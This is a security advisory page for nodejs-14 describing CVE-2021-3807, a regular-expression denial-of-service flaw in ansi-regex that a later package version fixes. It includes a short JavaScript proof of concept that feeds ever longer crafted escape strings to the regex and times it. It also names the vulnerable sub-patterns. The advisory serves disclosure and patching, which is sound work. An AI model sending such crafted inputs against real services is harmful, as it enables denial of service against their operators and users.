​
DirectorySecurity Advisories
Sign In
Security Advisories

CGA-pgv4-jr4j-qh5w

Published

Last updated

https://images.chainguard.dev/security/CGA-pgv4-jr4j-qh5w
Package

nodejs-14

Latest Update
Fixed
Fixed Version

14.21.3-r1

Aliases
  • CVE-2021-3807
  • GHSA-93q8-gq69-wqmw

Severity

7.5

High

CVSS V3

Summary

Inefficient Regular Expression Complexity in chalk/ansi-regex

Description

ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.

Proof of Concept

import ansiRegex from 'ansi-regex';
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = "\u001B["+";".repeat(i*10000);
    ansiRegex().test(attack_str)
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

The ReDOS is mainly due to the sub-patterns [[\\]()#;?]* and (?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*

References

Updates


Safe Source for Open Sourceâ„¢
Media KitContact Us
© 2024 Chainguard. All Rights Reserved.
Private PolicyTerms of Use

Product

Chainguard Images